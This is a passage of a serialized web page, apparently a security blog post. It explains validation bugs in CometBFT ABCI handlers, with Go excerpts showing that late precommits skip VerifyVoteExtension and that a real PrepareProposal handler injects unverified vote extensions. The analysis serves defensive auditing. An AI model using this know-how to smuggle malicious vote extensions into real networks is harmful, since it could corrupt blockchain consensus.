",{"type":28,"tag":98,"props":82757,"children":82759},{"className":82758},[],[82760],{"type":33,"value":82761},"PrepareProposal",{"type":33,"value":825},{"type":28,"tag":98,"props":82764,"children":82766},{"className":82765},[],[82767],{"type":33,"value":82768},"ProcessProposal",{"type":33,"value":825},{"type":28,"tag":98,"props":82771,"children":82773},{"className":82772},[],[82774],{"type":33,"value":82775},"ExtendVote",{"type":33,"value":6159},{"type":28,"tag":98,"props":82778,"children":82780},{"className":82779},[],[82781],{"type":33,"value":82782},"VerifyVoteExtension",{"type":33,"value":82784},". These ABCI methods allow developers to customize how blocks are constructed, as well as inject supplementary data into each block.",{"type":28,"tag":29,"props":82786,"children":82787},{},[82788],{"type":33,"value":82789},"Two of the best-known attack surfaces are",{"type":28,"tag":455,"props":82791,"children":82792},{},[82793,82822],{"type":28,"tag":459,"props":82794,"children":82795},{},[82796,82801,82802,82807,82809,82814,82815,82820],{"type":28,"tag":98,"props":82797,"children":82799},{"className":82798},[],[82800],{"type":33,"value":82761},{"type":33,"value":269},{"type":28,"tag":98,"props":82803,"children":82805},{"className":82804},[],[82806],{"type":33,"value":82775},{"type":33,"value":82808},") outputs being rejected due to ",{"type":28,"tag":98,"props":82810,"children":82812},{"className":82811},[],[82813],{"type":33,"value":82768},{"type":33,"value":269},{"type":28,"tag":98,"props":82816,"children":82818},{"className":82817},[],[82819],{"type":33,"value":82782},{"type":33,"value":82821},") over-validating, resulting in liveness failures.",{"type":28,"tag":459,"props":82823,"children":82824},{},[82825,82827,82832,82833,82838,82840,82845,82846,82851],{"type":33,"value":82826},"Malicious proposals and vote extensions not created through the ",{"type":28,"tag":98,"props":82828,"children":82830},{"className":82829},[],[82831],{"type":33,"value":82761},{"type":33,"value":269},{"type":28,"tag":98,"props":82834,"children":82836},{"className":82835},[],[82837],{"type":33,"value":82775},{"type":33,"value":82839},") are accepted due to ",{"type":28,"tag":98,"props":82841,"children":82843},{"className":82842},[],[82844],{"type":33,"value":82768},{"type":33,"value":269},{"type":28,"tag":98,"props":82847,"children":82849},{"className":82848},[],[82850],{"type":33,"value":82782},{"type":33,"value":82852},") under-validating.",{"type":28,"tag":29,"props":82854,"children":82855},{},[82856],{"type":33,"value":82857},"In essence, any difference in pairs of handlers will likely lead to security issues.",{"type":28,"tag":29,"props":82859,"children":82860},{},[82861,82863,82869,82871,82876],{"type":33,"value":82862},"There are also a few lesser known variants of these issues. One instance is the validation of ",{"type":28,"tag":98,"props":82864,"children":82866},{"className":82865},[],[82867],{"type":33,"value":82868},"VoteExtensions",{"type":33,"value":82870}," within ",{"type":28,"tag":98,"props":82872,"children":82874},{"className":82873},[],[82875],{"type":33,"value":82761},{"type":33,"value":82877},". To provide context, we start with a primer on the CometBTF consensus and vote extensions.",{"type":28,"tag":29,"props":82879,"children":82880},{},[82881,82883,82888,82890,82895],{"type":33,"value":82882},"Consensus starts with a leader creating a proposal and then broadcasting it to each validator. Validators then proceed to vote on whether or not to accept the proposal. During the voting phase, ",{"type":28,"tag":98,"props":82884,"children":82886},{"className":82885},[],[82887],{"type":33,"value":82775},{"type":33,"value":82889}," is called to attach additional data to the votes. Once a validator collects enough valid votes that pass ",{"type":28,"tag":98,"props":82891,"children":82893},{"className":82892},[],[82894],{"type":33,"value":82782},{"type":33,"value":82896},", a proposal is considered accepted and can be committed. After committing the proposal, a new leader starts to create the next proposal, bringing us back to the point where we started.",{"type":28,"tag":29,"props":82898,"children":82899},{},[82900,82902,82907],{"type":33,"value":82901},"So, where are the attached vote extension data used? It turns out a leader should include the vote extensions of the previous consensus round in its proposal. It might be tempting to conclude that all vote extensions an honest leader accepted have passed the ",{"type":28,"tag":98,"props":82903,"children":82905},{"className":82904},[],[82906],{"type":33,"value":82782},{"type":33,"value":82908}," check and are therefore valid. Thus, we can directly inject all vote extensions into our proposal.",{"type":28,"tag":29,"props":82910,"children":82911},{},[82912,82914,82919,82921,82927],{"type":33,"value":82913},"Unfortunately, CometBTF directly accepts late precommits without passing them through ",{"type":28,"tag":98,"props":82915,"children":82917},{"className":82916},[],[82918],{"type":33,"value":82782},{"type":33,"value":82920},". This exposes a time window where Byzantine validators can smuggle malicious vote into the next leader's cache, luring the leader into including invalid vote extensions into its ",{"type":28,"tag":98,"props":82922,"children":82924},{"className":82923},[],[82925],{"type":33,"value":82926},"Proposal",{"type":33,"value":141},{"type":28,"tag":234,"props":82929,"children":82931},{"code":82930,"language":75784,"meta":7,"className":75785,"style":7},"func (cs *State) addVote(vote *types.Vote, peerID p2p.ID) (added bool, err error) {\n    ...\n\n    // A precommit for the previous height?\n    // These come in while we wait timeoutCommit\n    if vote.Height+1 == cs.Height && vote.Type == types.PrecommitType {\n        ...\n        // Late precommits are not checked by VerifyVoteExtension\n        added, err = cs.LastCommit.AddVote(vote)\n        ...\n        return added, err\n    }\n    extEnabled := cs.state.ConsensusParams.Feature.VoteExtensionsEnabled(vote.Height)\n    if extEnabled {\n        ...\n        if vote.Type == types.PrecommitType && !vote.BlockID.IsNil() &&\n            !bytes.Equal(vote.ValidatorAddress, myAddr) { // Skip the VerifyVoteExtension call if the vote was issued by this validator.\n            ...\n            err := cs.blockExec.VerifyVoteExtension(context.TODO(), vote)\n            ...\n        }\n    } else if {\n        ...\n    }\n    ...\n}\n",[82932],{"type":28,"tag":98,"props":82933,"children":82934},{"__ignoreMap":7},[82935,83047,83054,83061,83069,83077,83161,83168,83176,83230,83237,83258,83265,83337,83353,83360,83434,83490,83497,83559,83566,83573,83592,83599,83606,83613],{"type":28,"tag":116,"props":82936,"children":82937},{"class":245,"line":246},[82938,82942,82946,82951,82955,82960,82964,82969,82973,82978,82982,82986,82990,82995,82999,83004,83009,83013,83018,83022,83027,83031,83035,83039,83043],{"type":28,"tag":116,"props":82939,"children":82940},{"style":376},[82941],{"type":33,"value":75920},{"type":28,"tag":116,"props":82943,"children":82944},{"style":266},[82945],{"type":33,"value":269},{"type":28,"tag":116,"props":82947,"children":82948},{"style":272},[82949],{"type":33,"value":82950},"cs ",{"type":28,"tag":116,"props":82952,"children":82953},{"style":370},[82954],{"type":33,"value":4240},{"type":28,"tag":116,"props":82956,"children":82957},{"style":339},[82958],{"type":33,"value":82959},"State",{"type":28,"tag":116,"props":82961,"children":82962},{"style":266},[82963],{"type":33,"value":1609},{"type":28,"tag":116,"props":82965,"children":82966},{"style":282},[82967],{"type":33,"value":82968},"addVote",{"type":28,"tag":116,"props":82970,"children":82971},{"style":266},[82972],{"type":33,"value":313},{"type":28,"tag":116,"props":82974,"children":82975},{"style":272},[82976],{"type":33,"value":82977},"vote",{"type":28,"tag":116,"props":82979,"children":82980},{"style":370},[82981],{"type":33,"value":9484},{"type":28,"tag":116,"props":82983,"children":82984},{"style":339},[82985],{"type":33,"value":5430},{"type":28,"tag":116,"props":82987,"children":82988},{"style":266},[82989],{"type":33,"value":141},{"type":28,"tag":116,"props":82991,"children":82992},{"style":339},[82993],{"type":33,"value":82994},"Vote",{"type":28,"tag":116,"props":82996,"children":82997},{"style":266},[82998],{"type":33,"value":825},{"type":28,"tag":116,"props":83000,"children":83001},{"style":272},[83002],{"type":33,"value":83003},"peerID",{"type":28,"tag":116,"props":83005,"children":83006},{"style":339},[83007],{"type":33,"value":83008}," p2p",{"type":28,"tag":116,"props":83010,"children":83011},{"style":266},[83012],{"type":33,"value":141},{"type":28,"tag":116,"props":83014,"children":83015},{"style":339},[83016],{"type":33,"value":83017},"ID",{"type":28,"tag":116,"props":83019,"children":83020},{"style":266},[83021],{"type":33,"value":76002},{"type":28,"tag":116,"props":83023,"children":83024},{"style":272},[83025],{"type":33,"value":83026},"added",{"type":28,"tag":116,"props":83028,"children":83029},{"style":339},[83030],{"type":33,"value":11718},{"type":28,"tag":116,"props":83032,"children":83033},{"style":266},[83034],{"type":33,"value":825},{"type":28,"tag":116,"props":83036,"children":83037},{"style":272},[83038],{"type":33,"value":1907},{"type":28,"tag":116,"props":83040,"children":83041},{"style":339},[83042],{"type":33,"value":14540},{"type":28,"tag":116,"props":83044,"children":83045},{"style":266},[83046],{"type":33,"value":844},{"type":28,"tag":116,"props":83048,"children":83049},{"class":245,"line":256},[83050],{"type":28,"tag":116,"props":83051,"children":83052},{"style":370},[83053],{"type":33,"value":20003},{"type":28,"tag":116,"props":83055,"children":83056},{"class":245,"line":293},[83057],{"type":28,"tag":116,"props":83058,"children":83059},{"emptyLinePlaceholder":19},[83060],{"type":33,"value":1044},{"type":28,"tag":116,"props":83062,"children":83063},{"class":245,"line":361},[83064],{"type":28,"tag":116,"props":83065,"children":83066},{"style":250},[83067],{"type":33,"value":83068},"    // A precommit for the previous height?\n",{"type":28,"tag":116,"props":83070,"children":83071},{"class":245,"line":387},[83072],{"type":28,"tag":116,"props":83073,"children":83074},{"style":250},[83075],{"type":33,"value":83076},"    // These come in while we wait timeoutCommit\n",{"type":28,"tag":116,"props":83078,"children":83079},{"class":245,"line":400},[83080,83084,83089,83093,83098,83102,83106,83110,83115,83119,83123,83127,83131,83135,83140,83144,83148,83152,83157],{"type":28,"tag":116,"props":83081,"children":83082},{"style":260},[83083],{"type":33,"value":11947},{"type":28,"tag":116,"props":83085,"children":83086},{"style":272},[83087],{"type":33,"value":83088}," vote",{"type":28,"tag":116,"props":83090,"children":83091},{"style":266},[83092],{"type":33,"value":141},{"type":28,"tag":116,"props":83094,"children":83095},{"style":272},[83096],{"type":33,"value":83097},"Height",{"type":28,"tag":116,"props":83099,"children":83100},{"style":370},[83101],{"type":33,"value":2268},{"type":28,"tag":116,"props":83103,"children":83104},{"style":350},[83105],{"type":33,"value":1824},{"type":28,"tag":116,"props":83107,"children":83108},{"style":370},[83109],{"type":33,"value":2953},{"type":28,"tag":116,"props":83111,"children":83112},{"style":272},[83113],{"type":33,"value":83114}," cs",{"type":28,"tag":116,"props":83116,"children":83117},{"style":266},[83118],{"type":33,"value":141},{"type":28,"tag":116,"props":83120,"children":83121},{"style":272},[83122],{"type":33,"value":83097},{"type":28,"tag":116,"props":83124,"children":83125},{"style":370},[83126],{"type":33,"value":13851},{"type":28,"tag":116,"props":83128,"children":83129},{"style":272},[83130],{"type":33,"value":83088},{"type":28,"tag":116,"props":83132,"children":83133},{"style":266},[83134],{"type":33,"value":141},{"type":28,"tag":116,"props":83136,"children":83137},{"style":272},[83138],{"type":33,"value":83139},"Type",{"type":28,"tag":116,"props":83141,"children":83142},{"style":370},[83143],{"type":33,"value":2953},{"type":28,"tag":116,"props":83145,"children":83146},{"style":272},[83147],{"type":33,"value":77795},{"type":28,"tag":116,"props":83149,"children":83150},{"style":266},[83151],{"type":33,"value":141},{"type":28,"tag":116,"props":83153,"children":83154},{"style":272},[83155],{"type":33,"value":83156},"PrecommitType",{"type":28,"tag":116,"props":83158,"children":83159},{"style":266},[83160],{"type":33,"value":1291},{"type":28,"tag":116,"props":83162,"children":83163},{"class":245,"line":614},[83164],{"type":28,"tag":116,"props":83165,"children":83166},{"style":370},[83167],{"type":33,"value":81461},{"type":28,"tag":116,"props":83169,"children":83170},{"class":245,"line":631},[83171],{"type":28,"tag":116,"props":83172,"children":83173},{"style":250},[83174],{"type":33,"value":83175},"        // Late precommits are not checked by VerifyVoteExtension\n",{"type":28,"tag":116,"props":83177,"children":83178},{"class":245,"line":665},[83179,83184,83188,83192,83196,83200,83204,83209,83213,83218,83222,83226],{"type":28,"tag":116,"props":83180,"children":83181},{"style":272},[83182],{"type":33,"value":83183},"        added",{"type":28,"tag":116,"props":83185,"children":83186},{"style":266},[83187],{"type":33,"value":825},{"type":28,"tag":116,"props":83189,"children":83190},{"style":272},[83191],{"type":33,"value":1907},{"type":28,"tag":116,"props":83193,"children":83194},{"style":370},[83195],{"type":33,"value":2226},{"type":28,"tag":116,"props":83197,"children":83198},{"style":272},[83199],{"type":33,"value":83114},{"type":28,"tag":116,"props":83201,"children":83202},{"style":266},[83203],{"type":33,"value":141},{"type":28,"tag":116,"props":83205,"children":83206},{"style":272},[83207],{"type":33,"value":83208},"LastCommit",{"type":28,"tag":116,"props":83210,"children":83211},{"style":266},[83212],{"type":33,"value":141},{"type":28,"tag":116,"props":83214,"children":83215},{"style":282},[83216],{"type":33,"value":83217},"AddVote",{"type":28,"tag":116,"props":83219,"children":83220},{"style":266},[83221],{"type":33,"value":313},{"type":28,"tag":116,"props":83223,"children":83224},{"style":272},[83225],{"type":33,"value":82977},{"type":28,"tag":116,"props":83227,"children":83228},{"style":266},[83229],{"type":33,"value":2830},{"type":28,"tag":116,"props":83231,"children":83232},{"class":245,"line":713},[83233],{"type":28,"tag":116,"props":83234,"children":83235},{"style":370},[83236],{"type":33,"value":81461},{"type":28,"tag":116,"props":83238,"children":83239},{"class":245,"line":750},[83240,83244,83249,83253],{"type":28,"tag":116,"props":83241,"children":83242},{"style":260},[83243],{"type":33,"value":15405},{"type":28,"tag":116,"props":83245,"children":83246},{"style":272},[83247],{"type":33,"value":83248}," added",{"type":28,"tag":116,"props":83250,"children":83251},{"style":266},[83252],{"type":33,"value":825},{"type":28,"tag":116,"props":83254,"children":83255},{"style":272},[83256],{"type":33,"value":83257},"err\n",{"type":28,"tag":116,"props":83259,"children":83260},{"class":245,"line":779},[83261],{"type":28,"tag":116,"props":83262,"children":83263},{"style":266},[83264],{"type":33,"value":3025},{"type":28,"tag":116,"props":83266,"children":83267},{"class":245,"line":796},[83268,83273,83277,83281,83285,83290,83294,83299,83303,83308,83312,83317,83321,83325,83329,83333],{"type":28,"tag":116,"props":83269,"children":83270},{"style":272},[83271],{"type":33,"value":83272},"    extEnabled",{"type":28,"tag":116,"props":83274,"children":83275},{"style":370},[83276],{"type":33,"value":76036},{"type":28,"tag":116,"props":83278,"children":83279},{"style":272},[83280],{"type":33,"value":83114},{"type":28,"tag":116,"props":83282,"children":83283},{"style":266},[83284],{"type":33,"value":141},{"type":28,"tag":116,"props":83286,"children":83287},{"style":272},[83288],{"type":33,"value":83289},"state",{"type":28,"tag":116,"props":83291,"children":83292},{"style":266},[83293],{"type":33,"value":141},{"type":28,"tag":116,"props":83295,"children":83296},{"style":272},[83297],{"type":33,"value":83298},"ConsensusParams",{"type":28,"tag":116,"props":83300,"children":83301},{"style":266},[83302],{"type":33,"value":141},{"type":28,"tag":116,"props":83304,"children":83305},{"style":272},[83306],{"type":33,"value":83307},"Feature",{"type":28,"tag":116,"props":83309,"children":83310},{"style":266},[83311],{"type":33,"value":141},{"type":28,"tag":116,"props":83313,"children":83314},{"style":282},[83315],{"type":33,"value":83316},"VoteExtensionsEnabled",{"type":28,"tag":116,"props":83318,"children":83319},{"style":266},[83320],{"type":33,"value":313},{"type":28,"tag":116,"props":83322,"children":83323},{"style":272},[83324],{"type":33,"value":82977},{"type":28,"tag":116,"props":83326,"children":83327},{"style":266},[83328],{"type":33,"value":141},{"type":28,"tag":116,"props":83330,"children":83331},{"style":272},[83332],{"type":33,"value":83097},{"type":28,"tag":116,"props":83334,"children":83335},{"style":266},[83336],{"type":33,"value":2830},{"type":28,"tag":116,"props":83338,"children":83339},{"class":245,"line":847},[83340,83344,83349],{"type":28,"tag":116,"props":83341,"children":83342},{"style":260},[83343],{"type":33,"value":11947},{"type":28,"tag":116,"props":83345,"children":83346},{"style":272},[83347],{"type":33,"value":83348}," extEnabled",{"type":28,"tag":116,"props":83350,"children":83351},{"style":266},[83352],{"type":33,"value":1291},{"type":28,"tag":116,"props":83354,"children":83355},{"class":245,"line":898},[83356],{"type":28,"tag":116,"props":83357,"children":83358},{"style":370},[83359],{"type":33,"value":81461},{"type":28,"tag":116,"props":83361,"children":83362},{"class":245,"line":907},[83363,83367,83371,83375,83379,83383,83387,83391,83395,83399,83403,83407,83411,83416,83420,83425,83429],{"type":28,"tag":116,"props":83364,"children":83365},{"style":260},[83366],{"type":33,"value":2943},{"type":28,"tag":116,"props":83368,"children":83369},{"style":272},[83370],{"type":33,"value":83088},{"type":28,"tag":116,"props":83372,"children":83373},{"style":266},[83374],{"type":33,"value":141},{"type":28,"tag":116,"props":83376,"children":83377},{"style":272},[83378],{"type":33,"value":83139},{"type":28,"tag":116,"props":83380,"children":83381},{"style":370},[83382],{"type":33,"value":2953},{"type":28,"tag":116,"props":83384,"children":83385},{"style":272},[83386],{"type":33,"value":77795},{"type":28,"tag":116,"props":83388,"children":83389},{"style":266},[83390],{"type":33,"value":141},{"type":28,"tag":116,"props":83392,"children":83393},{"style":272},[83394],{"type":33,"value":83156},{"type":28,"tag":116,"props":83396,"children":83397},{"style":370},[83398],{"type":33,"value":13851},{"type":28,"tag":116,"props":83400,"children":83401},{"style":370},[83402],{"type":33,"value":12530},{"type":28,"tag":116,"props":83404,"children":83405},{"style":272},[83406],{"type":33,"value":82977},{"type":28,"tag":116,"props":83408,"children":83409},{"style":266},[83410],{"type":33,"value":141},{"type":28,"tag":116,"props":83412,"children":83413},{"style":272},[83414],{"type":33,"value":83415},"BlockID",{"type":28,"tag":116,"props":83417,"children":83418},{"style":266},[83419],{"type":33,"value":141},{"type":28,"tag":116,"props":83421,"children":83422},{"style":282},[83423],{"type":33,"value":83424},"IsNil",{"type":28,"tag":116,"props":83426,"children":83427},{"style":266},[83428],{"type":33,"value":13709},{"type":28,"tag":116,"props":83430,"children":83431},{"style":370},[83432],{"type":33,"value":83433},"&&\n",{"type":28,"tag":116,"props":83435,"children":83436},{"class":245,"line":981},[83437,83442,83447,83451,83455,83459,83463,83467,83472,83476,83481,83485],{"type":28,"tag":116,"props":83438,"children":83439},{"style":370},[83440],{"type":33,"value":83441},"            !",{"type":28,"tag":116,"props":83443,"children":83444},{"style":272},[83445],{"type":33,"value":83446},"bytes",{"type":28,"tag":116,"props":83448,"children":83449},{"style":266},[83450],{"type":33,"value":141},{"type":28,"tag":116,"props":83452,"children":83453},{"style":282},[83454],{"type":33,"value":81916},{"type":28,"tag":116,"props":83456,"children":83457},{"style":266},[83458],{"type":33,"value":313},{"type":28,"tag":116,"props":83460,"children":83461},{"style":272},[83462],{"type":33,"value":82977},{"type":28,"tag":116,"props":83464,"children":83465},{"style":266},[83466],{"type":33,"value":141},{"type":28,"tag":116,"props":83468,"children":83469},{"style":272},[83470],{"type":33,"value":83471},"ValidatorAddress",{"type":28,"tag":116,"props":83473,"children":83474},{"style":266},[83475],{"type":33,"value":825},{"type":28,"tag":116,"props":83477,"children":83478},{"style":272},[83479],{"type":33,"value":83480},"myAddr",{"type":28,"tag":116,"props":83482,"children":83483},{"style":266},[83484],{"type":33,"value":23643},{"type":28,"tag":116,"props":83486,"children":83487},{"style":250},[83488],{"type":33,"value":83489},"// Skip the VerifyVoteExtension call if the vote was issued by this validator.\n",{"type":28,"tag":116,"props":83491,"children":83492},{"class":245,"line":1011},[83493],{"type":28,"tag":116,"props":83494,"children":83495},{"style":370},[83496],{"type":33,"value":82136},{"type":28,"tag":116,"props":83498,"children":83499},{"class":245,"line":1029},[83500,83504,83508,83512,83516,83521,83525,83529,83533,83538,83542,83547,83551,83555],{"type":28,"tag":116,"props":83501,"children":83502},{"style":272},[83503],{"type":33,"value":81954},{"type":28,"tag":116,"props":83505,"children":83506},{"style":370},[83507],{"type":33,"value":76036},{"type":28,"tag":116,"props":83509,"children":83510},{"style":272},[83511],{"type":33,"value":83114},{"type":28,"tag":116,"props":83513,"children":83514},{"style":266},[83515],{"type":33,"value":141},{"type":28,"tag":116,"props":83517,"children":83518},{"style":272},[83519],{"type":33,"value":83520},"blockExec",{"type":28,"tag":116,"props":83522,"children":83523},{"style":266},[83524],{"type":33,"value":141},{"type":28,"tag":116,"props":83526,"children":83527},{"style":282},[83528],{"type":33,"value":82782},{"type":28,"tag":116,"props":83530,"children":83531},{"style":266},[83532],{"type":33,"value":313},{"type":28,"tag":116,"props":83534,"children":83535},{"style":272},[83536],{"type":33,"value":83537},"context",{"type":28,"tag":116,"props":83539,"children":83540},{"style":266},[83541],{"type":33,"value":141},{"type":28,"tag":116,"props":83543,"children":83544},{"style":282},[83545],{"type":33,"value":83546},"TODO",{"type":28,"tag":116,"props":83548,"children":83549},{"style":266},[83550],{"type":33,"value":18038},{"type":28,"tag":116,"props":83552,"children":83553},{"style":272},[83554],{"type":33,"value":82977},{"type":28,"tag":116,"props":83556,"children":83557},{"style":266},[83558],{"type":33,"value":2830},{"type":28,"tag":116,"props":83560,"children":83561},{"class":245,"line":1038},[83562],{"type":28,"tag":116,"props":83563,"children":83564},{"style":370},[83565],{"type":33,"value":82136},{"type":28,"tag":116,"props":83567,"children":83568},{"class":245,"line":1047},[83569],{"type":28,"tag":116,"props":83570,"children":83571},{"style":266},[83572],{"type":33,"value":1954},{"type":28,"tag":116,"props":83574,"children":83575},{"class":245,"line":1071},[83576,83580,83584,83588],{"type":28,"tag":116,"props":83577,"children":83578},{"style":266},[83579],{"type":33,"value":15440},{"type":28,"tag":116,"props":83581,"children":83582},{"style":260},[83583],{"type":33,"value":2986},{"type":28,"tag":116,"props":83585,"children":83586},{"style":260},[83587],{"type":33,"value":15449},{"type":28,"tag":116,"props":83589,"children":83590},{"style":266},[83591],{"type":33,"value":1291},{"type":28,"tag":116,"props":83593,"children":83594},{"class":245,"line":1137},[83595],{"type":28,"tag":116,"props":83596,"children":83597},{"style":370},[83598],{"type":33,"value":81461},{"type":28,"tag":116,"props":83600,"children":83601},{"class":245,"line":1181},[83602],{"type":28,"tag":116,"props":83603,"children":83604},{"style":266},[83605],{"type":33,"value":3025},{"type":28,"tag":116,"props":83607,"children":83608},{"class":245,"line":1212},[83609],{"type":28,"tag":116,"props":83610,"children":83611},{"style":370},[83612],{"type":33,"value":20003},{"type":28,"tag":116,"props":83614,"children":83615},{"class":245,"line":1254},[83616],{"type":28,"tag":116,"props":83617,"children":83618},{"style":266},[83619],{"type":33,"value":406},{"type":28,"tag":29,"props":83621,"children":83622},{},[83623],{"type":33,"value":83624},"If developers are not aware of the subtle details regarding vote extension handling in CometBTF, it is quite easy to overlook implementing protections against these attacks.",{"type":28,"tag":75,"props":83626,"children":83628},{"id":83627},"real-world-examples-4",[83629],{"type":33,"value":76309},{"type":28,"tag":29,"props":83631,"children":83632},{},[83633,83635,83640,83642,83648,83650,83656],{"type":33,"value":83634},"An example of the bug we just described is shown here. ",{"type":28,"tag":98,"props":83636,"children":83638},{"className":83637},[],[83639],{"type":33,"value":82761},{"type":33,"value":83641}," only checks that each vote is properly signed by a validator in ",{"type":28,"tag":98,"props":83643,"children":83645},{"className":83644},[],[83646],{"type":33,"value":83647},"ValidateVoteExtension",{"type":33,"value":83649}," but does not verify it against the rules in ",{"type":28,"tag":98,"props":83651,"children":83653},{"className":83652},[],[83654],{"type":33,"value":83655},"VerifyVoteExtention.",{"type":33,"value":83657}," Therefore leaving the leader vulnerable to accepting malicious vote extensions in their proposals.",{"type":28,"tag":29,"props":83659,"children":83660},{},[83661],{"type":28,"tag":87,"props":83662,"children":83665},{"href":83663,"rel":83664},"https://github.com/sedaprotocol/seda-chain/blob/66c1b593fa81c7d443ab5fa82757b45e68597f49/app/abci/handlers.go#L180",[91],[83666],{"type":33,"value":76359},{"type":28,"tag":234,"props":83668,"children":83670},{"code":83669,"language":75784,"meta":7,"className":75785,"style":7},"func (h *Handlers) PrepareProposalHandler() sdk.PrepareProposalHandler {\n    return func(ctx sdk.Context, req *abcitypes.RequestPrepareProposal) (*abcitypes.ResponsePrepareProposal, error) {\n        ...\n        var injection []byte\n        if req.Height > ctx.ConsensusParams().Abci.VoteExtensionsEnableHeight && collectSigs {\n            //Fails to verify vote extensions with VerifyVoteExtension rules\n            err := baseapp.ValidateVoteExtensions(ctx, h.stakingKeeper, req.Height, ctx.ChainID(), req.LocalLastCommit)\n            if err != nil {\n                return nil, err\n            }\n            injection, err = json.Marshal(req.LocalLastCommit)\n            if err != nil {\n                h.logger.Error(\"failed to marshal extended votes\", \"err\", err)\n                return nil, err\n            }\n            ...\n        }\n        defaultRes, err := h.defaultPrepareProposal(ctx, req)\n        ...\n        proposalTxs := defaultRes.Txs\n        if injection != nil {\n            proposalTxs = append([][]byte{injection}, proposalTxs...)\n            h.logger.Debug(\"injected local last commit\", \"height\", req.Height)\n        }\n        return &abcitypes.ResponsePrepareProposal{\n            Txs: proposalTxs,\n        }, nil\n    }\n}\n",[83671],{"type":28,"tag":98,"props":83672,"children":83673},{"__ignoreMap":7},[83674,83728,83819,83826,83847,83914,83922,84027,84050,84069,84076,84130,84153,84208,84227,84234,84241,84248,84302,84309,84335,84358,84410,84472,84479,84506,84526,84538,84545],{"type":28,"tag":116,"props":83675,"children":83676},{"class":245,"line":246},[83677,83681,83685,83690,83694,83699,83703,83708,83712,83716,83720,83724],{"type":28,"tag":116,"props":83678,"children":83679},{"style":376},[83680],{"type":33,"value":75920},{"type":28,"tag":116,"props":83682,"children":83683},{"style":266},[83684],{"type":33,"value":269},{"type":28,"tag":116,"props":83686,"children":83687},{"style":272},[83688],{"type":33,"value":83689},"h ",{"type":28,"tag":116,"props":83691,"children":83692},{"style":370},[83693],{"type":33,"value":4240},{"type":28,"tag":116,"props":83695,"children":83696},{"style":339},[83697],{"type":33,"value":83698},"Handlers",{"type":28,"tag":116,"props":83700,"children":83701},{"style":266},[83702],{"type":33,"value":1609},{"type":28,"tag":116,"props":83704,"children":83705},{"style":282},[83706],{"type":33,"value":83707},"PrepareProposalHandler",{"type":28,"tag":116,"props":83709,"children":83710},{"style":266},[83711],{"type":33,"value":13709},{"type":28,"tag":116,"props":83713,"children":83714},{"style":339},[83715],{"type":33,"value":78350},{"type":28,"tag":116,"props":83717,"children":83718},{"style":266},[83719],{"type":33,"value":141},{"type":28,"tag":116,"props":83721,"children":83722},{"style":339},[83723],{"type":33,"value":83707},{"type":28,"tag":116,"props":83725,"children":83726},{"style":266},[83727],{"type":33,"value":1291},{"type":28,"tag":116,"props":83729,"children":83730},{"class":245,"line":256},[83731,83735,83739,83743,83747,83751,83755,83759,83763,83768,83772,83777,83781,83786,83790,83794,83798,83802,83807,83811,83815],{"type":28,"tag":116,"props":83732,"children":83733},{"style":260},[83734],{"type":33,"value":393},{"type":28,"tag":116,"props":83736,"children":83737},{"style":376},[83738],{"type":33,"value":79628},{"type":28,"tag":116,"props":83740,"children":83741},{"style":266},[83742],{"type":33,"value":313},{"type":28,"tag":116,"props":83744,"children":83745},{"style":272},[83746],{"type":33,"value":19944},{"type":28,"tag":116,"props":83748,"children":83749},{"style":339},[83750],{"type":33,"value":78261},{"type":28,"tag":116,"props":83752,"children":83753},{"style":266},[83754],{"type":33,"value":141},{"type":28,"tag":116,"props":83756,"children":83757},{"style":339},[83758],{"type":33,"value":75969},{"type":28,"tag":116,"props":83760,"children":83761},{"style":266},[83762],{"type":33,"value":825},{"type":28,"tag":116,"props":83764,"children":83765},{"style":272},[83766],{"type":33,"value":83767},"req",{"type":28,"tag":116,"props":83769,"children":83770},{"style":370},[83771],{"type":33,"value":9484},{"type":28,"tag":116,"props":83773,"children":83774},{"style":339},[83775],{"type":33,"value":83776},"abcitypes",{"type":28,"tag":116,"props":83778,"children":83779},{"style":266},[83780],{"type":33,"value":141},{"type":28,"tag":116,"props":83782,"children":83783},{"style":339},[83784],{"type":33,"value":83785},"RequestPrepareProposal",{"type":28,"tag":116,"props":83787,"children":83788},{"style":266},[83789],{"type":33,"value":76002},{"type":28,"tag":116,"props":83791,"children":83792},{"style":370},[83793],{"type":33,"value":4240},{"type":28,"tag":116,"props":83795,"children":83796},{"style":339},[83797],{"type":33,"value":83776},{"type":28,"tag":116,"props":83799,"children":83800},{"style":266},[83801],{"type":33,"value":141},{"type":28,"tag":116,"props":83803,"children":83804},{"style":339},[83805],{"type":33,"value":83806},"ResponsePrepareProposal",{"type":28,"tag":116,"props":83808,"children":83809},{"style":266},[83810],{"type":33,"value":825},{"type":28,"tag":116,"props":83812,"children":83813},{"style":339},[83814],{"type":33,"value":974},{"type":28,"tag":116,"props":83816,"children":83817},{"style":266},[83818],{"type":33,"value":844},{"type":28,"tag":116,"props":83820,"children":83821},{"class":245,"line":293},[83822],{"type":28,"tag":116,"props":83823,"children":83824},{"style":370},[83825],{"type":33,"value":81461},{"type":28,"tag":116,"props":83827,"children":83828},{"class":245,"line":361},[83829,83833,83838,83842],{"type":28,"tag":116,"props":83830,"children":83831},{"style":376},[83832],{"type":33,"value":79737},{"type":28,"tag":116,"props":83834,"children":83835},{"style":272},[83836],{"type":33,"value":83837}," injection",{"type":28,"tag":116,"props":83839,"children":83840},{"style":266},[83841],{"type":33,"value":75847},{"type":28,"tag":116,"props":83843,"children":83844},{"style":339},[83845],{"type":33,"value":83846},"byte\n",{"type":28,"tag":116,"props":83848,"children":83849},{"class":245,"line":387},[83850,83854,83859,83863,83867,83871,83875,83879,83883,83887,83892,83896,83901,83905,83910],{"type":28,"tag":116,"props":83851,"children":83852},{"style":260},[83853],{"type":33,"value":2943},{"type":28,"tag":116,"props":83855,"children":83856},{"style":272},[83857],{"type":33,"value":83858}," 